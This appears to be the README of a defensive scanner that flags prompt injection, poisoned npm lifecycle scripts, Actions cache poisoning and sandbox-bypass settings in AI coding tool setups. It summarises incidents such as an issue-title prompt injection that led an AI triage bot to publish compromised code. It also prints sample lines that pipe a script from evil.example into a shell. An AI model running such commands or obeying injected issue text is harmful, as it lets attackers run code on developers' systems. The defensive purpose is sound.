# aidevshield

Security scanner that catches prompt injection, supply-chain attacks, and invisible backdoors in AI coding tool configurations. The same patterns behind Clinejection, Cacheract, and the Shai-Hulud npm worm.
```
$ npx aidevshield scan .

aidevshield v1.0.0 — AI Workflow Security Scanner
Scanning: /home/user/my-project
Checks: workflows | package.json | AI configs | .gitignore

[CRITICAL] .github/workflows/ai-triage.yml:18
  Wildcard user permissions on AI workflow
  allowed_non_write_users: "*" lets any GitHub user trigger this workflow
  Fix: Restrict to specific trusted usernames or remove the wildcard

[CRITICAL] .github/workflows/pr-deploy.yml:5
  pull_request_target with untrusted checkout (Pwn Request)
  Checking out PR head runs attacker code with access to secrets
  Fix: Use pull_request trigger instead, or checkout base ref

[HIGH] node_modules/shady-pkg/package.json
  curl | sh in postinstall lifecycle script
  Executes remote code during npm install — Shai-Hulud attack pattern
  Fix: Remove the dependency or pin to a verified version

[CRITICAL] .cursorrules:1
  Hidden Unicode characters detected (invisible prompt injection)
  3 zero-width joiners found — invisible to humans, read by AI
  Fix: Remove non-visible characters or regenerate the file

24 issues found (6 critical, 8 high, 6 medium, 2 low, 2 info)
```
# Detection Rules

22 detection rules across three attack surfaces. Every rule maps to a real-world exploit.

| Detection rule | Real-world exploit |
| --- | --- |
| Wildcard user permissions on AI workflows | Clinejection |
| Untrusted input interpolation (`${{ github.event.issue.title }}`) | Script injection |
| `pull_request_target` with untrusted checkout | Pwn Request |
| AI workflow triggered by issues/comments | Prompt injection |
| AI step with shell execution capability | RCE via AI |
| Unpinned third-party actions (mutable tags) | tj-actions attack |
| Cache + credentials in same workflow | Cacheract |
| `curl \| sh` / `wget \| bash` in lifecycle scripts | Shai-Hulud worm |
| `npm install -g` in lifecycle hooks | Global package hijack |
| `eval()` / `exec()` / `child_process` in scripts | Arbitrary code execution |
| base64 decode / `new Function()` | Obfuscated payloads |
| Hidden Unicode characters (zero-width, RTL marks) | Invisible prompt injection |
| `Bash(*)` wildcard permissions | Unrestricted shell access |
| `dangerouslyDisableSandbox: true` | Sandbox bypass |
| `dangerously-skip-permissions` | Permission bypass |
# Real-World Incidents

Every detection rule exists because of a real incident. These aren't theoretical.

## Clinejection: 5M+ developers exposed

An attacker opened a GitHub issue with prompt injection in the title. Cline's AI triage bot published compromised code to the VS Code Marketplace.

**aidevshield detects:** wildcard permissions, untrusted input interpolation, AI action with shell execution
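The untrusted-interpolation shape at the heart of this incident, and the standard mitigation, look roughly like this in workflow YAML (a sketch, not Cline's actual workflow):

```yaml
# Vulnerable: the issue title is interpolated directly into the shell script,
# so a title like  "; curl evil.example/x.sh | sh; echo "  becomes executable code.
- run: echo "Triaging: ${{ github.event.issue.title }}"

# Safer: pass untrusted input through an environment variable; the shell
# receives it as data, never as script text.
- run: echo "Triaging: $ISSUE_TITLE"
  env:
    ISSUE_TITLE: ${{ github.event.issue.title }}
```

The same pattern applies to any attacker-controlled field (`issue.body`, `pull_request.title`, comment bodies) fed to an AI step or shell.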
## tj-actions attack: 23,000+ repos compromised

Attackers exploited `pull_request_target` to steal a PAT, then compromised `tj-actions/changed-files`. Tags were silently repointed. The ultimate target: Coinbase.

**aidevshield detects:** `pull_request_target` with untrusted checkout, unpinned third-party actions
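The tag-repointing half of this attack is defeated by pinning third-party actions to a full commit SHA instead of a mutable tag. A sketch (the SHA below is a placeholder, not a real commit):

```yaml
# Mutable tag: whoever controls the action's repo can silently repoint
# v35 at malicious code, and every consumer picks it up on the next run.
- uses: tj-actions/changed-files@v35

# Pinned: the action is fetched by content-addressed commit SHA, which
# cannot be repointed. (Placeholder SHA shown; substitute a commit you
# have actually audited, and keep the tag in a comment for readability.)
- uses: tj-actions/changed-files@0123456789abcdef0123456789abcdef01234567 # v35
```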
## Cacheract: any repo using GitHub Actions cache

GitHub Actions caches are poisoned to replace `node_modules` with malicious code. When publishing workflows restore the cache, attacker code runs with `NPM_TOKEN` access.

**aidevshield detects:** `actions/cache` combined with credential secrets in the same workflow
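One way to break this pattern is to keep credentialed publish jobs away from restored caches entirely. A sketch of a publish job that does a clean, script-free install instead of restoring `node_modules` from cache (job layout and secret name are illustrative):

```yaml
publish:
  runs-on: ubuntu-latest
  steps:
    - uses: actions/checkout@v4
    # No actions/cache step here: a poisoned cache entry cannot reach this job.
    - run: npm ci --ignore-scripts   # clean install with lifecycle scripts disabled
    - run: npm publish
      env:
        NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
```

The cost is a slower install; the benefit is that the only job holding `NPM_TOKEN` never executes cached or lifecycle-script code.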
## Shai-Hulud: 500+ packages, self-propagating

The first self-propagating worm in npm. It used postinstall hooks with `curl | bash`, harvested tokens, and self-replicated to other packages owned by the same maintainer.

**aidevshield detects:** `curl | bash` patterns, suspicious lifecycle scripts in `node_modules/`
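The lifecycle-script check can be sketched as a small Node function over a parsed `package.json`. This is an illustrative sketch, not aidevshield's actual implementation; the regex covers the `curl | sh` / `wget | bash` shapes named in the rules table.

```javascript
// Sketch of the lifecycle-script check (illustrative, not aidevshield's real code).
// Looks for "curl | sh" / "wget | bash" style remote execution in npm lifecycle
// hooks, the propagation mechanism the Shai-Hulud worm used.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
const REMOTE_EXEC = /\b(curl|wget)\b[^|;&]*\|\s*(sh|bash)\b/;

function auditLifecycleScripts(pkg) {
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = pkg.scripts && pkg.scripts[hook];
    if (cmd && REMOTE_EXEC.test(cmd)) {
      findings.push({ hook, cmd, severity: 'HIGH' });
    }
  }
  return findings;
}

// Flags the postinstall hook of a package shaped like the scan output above:
const shady = {
  name: 'shady-pkg',
  scripts: { postinstall: 'curl -s https://evil.example/x.sh | sh' },
};
console.log(auditLifecycleScripts(shady));
```

A full scanner would walk every `package.json` under `node_modules/` and apply the same test to each.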
# Getting Started

1. Run `npx aidevshield scan .`
2. Follow the fix suggestions
3. Add a scan to `.github/workflows/` for continuous checking
# CI/CD Integration

```yaml
# .github/workflows/security.yml
name: AI Security Check
on: [push, pull_request]
jobs:
  aidevshield:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npx aidevshield scan .
```

No API keys, no network requests, no telemetry.
- **Dependencies:** just `js-yaml`. Node 16+. Nothing else.
- **Output formats:** text, JSON, and SARIF 2.1.0 for GitHub Code Scanning.
- **Testing:** every detection rule is tested against realistic fixtures.
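Since SARIF 2.1.0 output is supported, results can flow into GitHub Code Scanning. A sketch of the upload step; the output flag name is an assumption, not a documented aidevshield option, so check `npx aidevshield --help` for the real one:

```yaml
# Assumed flag name for SARIF output; verify against aidevshield's own help text.
- run: npx aidevshield scan . --format sarif > results.sarif
- uses: github/codeql-action/upload-sarif@v3
  with:
    sarif_file: results.sarif
```

With this in place, findings appear as code scanning alerts on the repository's Security tab.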